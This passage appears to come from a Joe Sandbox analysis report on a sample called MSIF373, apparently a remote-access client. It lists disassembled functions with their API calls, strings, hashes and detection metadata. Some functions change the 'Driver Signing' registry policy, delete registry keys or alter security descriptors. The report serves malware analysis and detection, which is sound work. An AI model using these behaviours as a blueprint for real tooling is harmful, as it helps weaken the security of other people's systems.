                                                                                          • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,00000000,00000000), ref: 00598196
                                                                                          • LeaveCriticalSection.KERNEL32(?,?), ref: 0059819D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Value$CriticalEnumSection$DeleteEnterInfoLeaveQuery
                                                                                          • String ID: ..\CTL32\Config.cpp$err == 0$maxname < _tsizeof (keybuf)
                                                                                          • API String ID: 3037067311-2757561423
                                                                                          • Opcode ID: c6beb4c796f54148a810344ce2e775ecf611f5f610b13ef909768b53cbf622e0
                                                                                          • Instruction ID: 8ce01294830b2104e49b7c4cfcf151d1ab90748d890c23f68ef6f6205933d2eb
                                                                                          • Opcode Fuzzy Hash: c6beb4c796f54148a810344ce2e775ecf611f5f610b13ef909768b53cbf622e0
                                                                                          • Instruction Fuzzy Hash: A0418571A80219AFDB14CF54DC49FE5FBB8FB59B00F044159F519A7280DB706945CFA1
                                                                                          Function 005DE2AC Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 114sleepwindowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • Sleep.KERNEL32(000003E8), ref: 005DE852
                                                                                          • PostMessageW.USER32(?,000003E1,?,00000000), ref: 005DEDE1
                                                                                          • DestroyWindow.USER32(?), ref: 005DEDEE
                                                                                          • Sleep.KERNEL32(000003E8), ref: 005DEE58
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Sleep$DestroyMessagePostWindow
                                                                                          • String ID: Done:$Exit$OK$Restart$winexec.ok
                                                                                          • API String ID: 2870736975-2848714714
                                                                                          • Opcode ID: 0ad97b93345c077d87a6b55fed3467e8e79f8c3149ca9bde1d1c649861857d5f
                                                                                          • Instruction ID: a1898b087c2cd4d06e3dc25103b319b74772662a63ede1714211e5ac9e81aedb
                                                                                          • Opcode Fuzzy Hash: 0ad97b93345c077d87a6b55fed3467e8e79f8c3149ca9bde1d1c649861857d5f
                                                                                          • Instruction Fuzzy Hash: A1316C76D4111197CB307B6CAC9BF6D3EA6BB81310F094667F4869B3D1EA704D818BA2
                                                                                          Function 005BE560 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 104registrysleepCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Driver Signing,00000000,000F003F,?,00000000,?,00000000,?,005BE88D,?,0059A1B1,?), ref: 005BE583
                                                                                          • RegQueryValueExW.ADVAPI32(?,Policy,00000000,?,?,?,?,005BE88D,?,0059A1B1,?), ref: 005BE5B1
                                                                                          • RegSetValueExW.ADVAPI32(00000000,Policy,00000000,00000004,005BE88D,00000004,?,Policy,00000000,?,?,?), ref: 005BE5DF
                                                                                          • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Driver Signing,00000000,000F003F,?,?,005BE88D,?,0059A1B1,?), ref: 005BE607
                                                                                          • RegQueryValueExW.ADVAPI32(?,Policy,00000000,?,?,?,?,005BE88D,?,0059A1B1,?), ref: 005BE638
                                                                                          • RegSetValueExW.ADVAPI32(?,Policy,00000000,00000003,005BE88D,00000000), ref: 005BE66C
                                                                                          • Sleep.KERNEL32(000003E8,?,005BE88D,?,0059A1B1,?), ref: 005BE693
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Value$OpenQuery$Sleep
                                                                                          • String ID: Policy$Software\Microsoft\Driver Signing
                                                                                          • API String ID: 3131223082-3913124361
                                                                                          • Opcode ID: c9eff40889c055404c797736bc24c8afcaf1c2ac04976a60492a3d9b630d35ff
                                                                                          • Instruction ID: cb1828bddf09204a53b879d4a15f69ae60f5c4eda01b0bd76d4b4df78a0a206c
                                                                                          • Opcode Fuzzy Hash: c9eff40889c055404c797736bc24c8afcaf1c2ac04976a60492a3d9b630d35ff
                                                                                          • Instruction Fuzzy Hash: 38316EB1A40304AFDB308F65DC86FEABBB9FB29B05F14441EF61996180E7B46944CB61
                                                                                          Function 005E2347 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91memorylibraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetAce.ADVAPI32(?,00000000,?), ref: 005E2369
                                                                                          • AddAce.ADVAPI32(00000000,00000002,000000FF,00000000,?), ref: 005E2393
                                                                                          • AddAuditAccessAce.ADVAPI32(00000000,00000002,?,?,?,?), ref: 005E23B8
                                                                                          • GetLastError.KERNEL32(?,00000002,?,?,?,?,?,00000002,000000FF,00000000,?), ref: 005E23C2
                                                                                          • GetProcAddress.KERNEL32(00000104,SetNamedSecurityInfoW), ref: 005E23E1
                                                                                          • LocalFree.KERNEL32(?,?,?,00000001), ref: 005E2435
                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000001), ref: 005E2442
                                                                                          • HeapFree.KERNEL32(00000000), ref: 005E2449
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FreeHeap$AccessAddressAuditErrorLastLocalProcProcess
                                                                                          • String ID: SetNamedSecurityInfoW
                                                                                          • API String ID: 4281476915-3189892758
                                                                                          • Opcode ID: fd25e0a0b2ff458ee17c207001a8c8ec14bbbb14d6dddd6a9e6e4f786dd4a314
                                                                                          • Instruction ID: ca0a2a176ac2aa489833777b07aa598e68d1d7041bd58cbc55eaef42a0a8fa05
                                                                                          • Opcode Fuzzy Hash: fd25e0a0b2ff458ee17c207001a8c8ec14bbbb14d6dddd6a9e6e4f786dd4a314
                                                                                          • Instruction Fuzzy Hash: 873152B1A002199FDB24CF55DC99FEAB7B9FB48701F048189FA49A7280D7709D418FA0
                                                                                          Function 005CC8F0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 78librarytimeloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 005C92B0: GetVersionExW.KERNEL32(0063BEF0,00000000), ref: 005C92E0
                                                                                            • Part of subcall function 005C92B0: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 005C931F
                                                                                          • LoadLibraryW.KERNEL32(secur32.dll,DE64E134), ref: 005CC931
                                                                                          • GetProcAddress.KERNEL32(00000000,GetUserNameExW), ref: 005CC949
                                                                                          • timeGetTime.WINMM ref: 005CC95C
                                                                                          • timeGetTime.WINMM(?,?), ref: 005CC973
                                                                                          • GetLastError.KERNEL32(?,?), ref: 005CC979
                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 005CC99B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: LibraryTimetime$AddressErrorFreeLastLoadOpenProcVersion
                                                                                          • String ID: GetUserNameEx ret %d, %s, time=%d ms, e=%d$GetUserNameExW$secur32.dll
                                                                                          • API String ID: 1482422562-3336919047
                                                                                          • Opcode ID: 59ecd8565e7ba10bde08cde06382e994c2919085f52da4ac682e3ccf5b2ecd05
                                                                                          • Instruction ID: 8d34cabc213d0ba73cddcee0846889b4c7eb73943efc638f970efa0d33200ace
                                                                                          • Opcode Fuzzy Hash: 59ecd8565e7ba10bde08cde06382e994c2919085f52da4ac682e3ccf5b2ecd05
                                                                                          • Instruction Fuzzy Hash: 55213D71D04616AFDB109FA8DD49FABBFB9EB49B14F05452AFC05E7280E77099008BE1
                                                                                          Function 00598660 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 260registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,7#Y,?), ref: 005986C6
                                                                                          • RegEnumValueW.ADVAPI32(?,?,?,?,00000000,?,?,?,00000000,7#Y,?), ref: 0059874D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: EnumInfoQueryValue
                                                                                          • String ID: ..\CTL32\Config.cpp$7#Y$_tcslen (k.m_k) < _tsizeof (m_szSectionAndKey)$err == 0$maxname < _tsizeof (m_szSectionAndKey)
                                                                                          • API String ID: 918324718-2149373132
                                                                                          • Opcode ID: de47fd093281daacdb3d4e34d1c6301e8dde4cf9bca258e2509055ddef3b7e50
                                                                                          • Instruction ID: 2ef4f34162ab11fcda3d0d9c3b347998f0b5d16d3bd24f7bc4e2068b99b2aee4
                                                                                          • Opcode Fuzzy Hash: de47fd093281daacdb3d4e34d1c6301e8dde4cf9bca258e2509055ddef3b7e50
                                                                                          • Instruction Fuzzy Hash: 4F91BF71A00701AFDB20CF65C885BA7BBF5BF89304F14495CE88697681EB70EA44CB61
                                                                                          Function 0059CD50 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 163threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • EnterCriticalSection.KERNEL32(?,DE64E134), ref: 0059CD82
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0059CDA2
                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 0059CE7C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CriticalSection$CurrentEnterLeaveThread
                                                                                          • String ID: ..\CTL32\EVMNGR.cpp$bFound
                                                                                          • API String ID: 2351996187-1229222698
                                                                                          • Opcode ID: a7a036e17f3a238c77098a6eff206d73fd3e0c9ec31014dc2e6d36330151d348
                                                                                          • Instruction ID: 2b626ddc1b3363ce7340b219513b07bc72d9d81761e17b9f21eb51e6302a1c4e
                                                                                          • Opcode Fuzzy Hash: a7a036e17f3a238c77098a6eff206d73fd3e0c9ec31014dc2e6d36330151d348
                                                                                          • Instruction Fuzzy Hash: 3F515C71A042849FDF16CF68C484FAABFE9FF49310F598559E8169B292D731ED40CB90
                                                                                          Function 005D4DBE Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 149registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • wsprintfW.USER32 ref: 005D4EC2
                                                                                          • RegSetValueExW.ADVAPI32(?,?,00000000,?,?,?), ref: 005D4F50
                                                                                            • Part of subcall function 005DF030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 005DF04D
                                                                                            • Part of subcall function 005DF030: wsprintfW.USER32 ref: 005DF09D
                                                                                            • Part of subcall function 005DF030: wvsprintfW.USER32(?,?,00000000), ref: 005DF0BE
                                                                                            • Part of subcall function 005DF030: wsprintfW.USER32 ref: 005DF0D3
                                                                                          • RegEnumValueW.ADVAPI32(?,?,?,?,00000000,?,?,?), ref: 005D4FFF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: wsprintf$Value$EnumLocalTimewvsprintf
                                                                                          • String ID: "$%s exists$%s=%s, err=%d$Found %s$\%s
                                                                                          • API String ID: 2854092196-3597523911
                                                                                          • Opcode ID: cced1575da90b2e46880cc7e6f8e554d639ed411e4ef0bc2abd785d5d0fa14a0
                                                                                          • Instruction ID: 5412f28b5f404b2fadc0891577c5d411c65d648300c2708c27053ea52d7ea75d
                                                                                          • Opcode Fuzzy Hash: cced1575da90b2e46880cc7e6f8e554d639ed411e4ef0bc2abd785d5d0fa14a0
                                                                                          • Instruction Fuzzy Hash: 3251A17690112A9BDF24DB58CC85EEE77B9FF94300F048596F509A3250EF705A488FA1
                                                                                          Function 005D25F0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 136registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 005DF030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 005DF04D
                                                                                            • Part of subcall function 005DF030: wsprintfW.USER32 ref: 005DF09D
                                                                                            • Part of subcall function 005DF030: wvsprintfW.USER32(?,?,00000000), ref: 005DF0BE
                                                                                            • Part of subcall function 005DF030: wsprintfW.USER32 ref: 005DF0D3
                                                                                          • RegCreateKeyW.ADVAPI32(80000002,?,?), ref: 005D2683
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: wsprintf$CreateLocalTimewvsprintf
                                                                                          • String ID: EventMessageFile$RegisterEventLog(%s)$TypesSupported
                                                                                          • API String ID: 1283108071-324002705
                                                                                          • Opcode ID: e9e268d5be2ff1709867e53eae31ab8ce1c5440f2d499cc5ec0082ef625ee1d7
                                                                                          • Instruction ID: c7912593194efeb612443e765e977d310f36362108e58490bbae237908daa717
                                                                                          • Opcode Fuzzy Hash: e9e268d5be2ff1709867e53eae31ab8ce1c5440f2d499cc5ec0082ef625ee1d7
                                                                                          • Instruction Fuzzy Hash: 6641C971A042199BCB24AF68DC1ABFB77B9EF54710F044596F90AD7291EA709E40CB90
                                                                                          Function 00594060 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 130registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RegEnumKeyExW.ADVAPI32(?,?,?,?,00000000,00000000,00000000,?), ref: 00594113
                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 00594145
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 005941A3
                                                                                            • Part of subcall function 005C37C0: RegQueryValueExW.ADVAPI32(00000000,?,?,00000000,00000000,00000000,?,00000000,752F55F0,?,005C9375,00000000,CSDVersion,00000000,00000000,?), ref: 005C37E0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseEnumOpenQueryValue
                                                                                          • String ID: (idata->flags & CFG_VOLATILE) == 0$..\CTL32\Config.cpp$CurrConfig$General\ProductID$nssCurrConfig
                                                                                          • API String ID: 3984146545-3838709216
                                                                                          • Opcode ID: 5b5b1461f86581f0083b2b6dbd9911e668fb008d40163a6c9e24632b6b9c4114
                                                                                          • Instruction ID: 7516e2e609cc7da9e282855aa7610f95ca60dcb3d09a3023640de483f4ff98d6
                                                                                          • Opcode Fuzzy Hash: 5b5b1461f86581f0083b2b6dbd9911e668fb008d40163a6c9e24632b6b9c4114
                                                                                          • Instruction Fuzzy Hash: C0417472A00319AFDB20DB64DC45FEA77B9AB89700F04859DF64DD7241DA70AA44CFA1
                                                                                          Function 005CEB90 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 130COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: "$NSMFileExists(%s) took %d ms$client32u.ini
                                                                                          • API String ID: 0-1321718478
                                                                                          • Opcode ID: 6e9cd5ae2f14853b799be48bf09844d8742770c55caafc6d3cb7f069939ca4fa
                                                                                          • Instruction ID: d22e58b81e3318ae44d85ac34932e4d625bffe30fafe3070cf95ade4a03941cc
                                                                                          • Opcode Fuzzy Hash: 6e9cd5ae2f14853b799be48bf09844d8742770c55caafc6d3cb7f069939ca4fa
                                                                                          • Instruction Fuzzy Hash: 1E4107329002189FCB20DFA8DC5AFEA77B5FB44314F1486A9F91A9B1D1E7B05E44CB90
                                                                                          Function 005DAD60 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 123registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 005DF030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 005DF04D
                                                                                            • Part of subcall function 005DF030: wsprintfW.USER32 ref: 005DF09D
                                                                                            • Part of subcall function 005DF030: wvsprintfW.USER32(?,?,00000000), ref: 005DF0BE
                                                                                            • Part of subcall function 005DF030: wsprintfW.USER32 ref: 005DF0D3
                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,000F003F,?), ref: 005DAD9A
                                                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 005DADDE
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 005DAE79
                                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 005DAE81
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 005DAEB6
                                                                                            • Part of subcall function 005DAD60: RegCloseKey.ADVAPI32(?), ref: 005DAE25
                                                                                            • Part of subcall function 005DAD60: RegOpenKeyExW.ADVAPI32(?,?,00000000,000F003F,?), ref: 005DAE3B
                                                                                          Strings
                                                                                          • Delete registry entries for %s, xrefs: 005DAD7D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Close$Openwsprintf$DeleteEnumLocalTimewvsprintf
                                                                                          • String ID: Delete registry entries for %s
                                                                                          • API String ID: 1838657294-4139843425
                                                                                          • Opcode ID: c0946fb0307c352789c8fb98160639e56829b947ebe6ae83070bd029046c6f0d
                                                                                          • Instruction ID: e923b67d182b904a7a37ce7c05292bcd78a67b7d336a450f6582cb964e4f7021
                                                                                          • Opcode Fuzzy Hash: c0946fb0307c352789c8fb98160639e56829b947ebe6ae83070bd029046c6f0d
                                                                                          • Instruction Fuzzy Hash: CC31EB35E0021867CB30DB69DC49FEB7BBDEB98711F04409AFA4997241DA709D84CBA1
                                                                                          Function 0059E150 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 119COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetVersionExW.KERNEL32(?), ref: 0059E179
                                                                                          • GetTickCount.KERNEL32 ref: 0059E1AA
                                                                                          • GetDC.USER32(00000000), ref: 0059E1B1
                                                                                          • ReleaseDC.USER32(00000000,?), ref: 0059E28C
                                                                                          • GetTickCount.KERNEL32 ref: 0059E292
                                                                                          • GetSystemMetrics.USER32(00000000), ref: 0059E2A3
                                                                                          • GetSystemMetrics.USER32(00000001), ref: 0059E2B1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
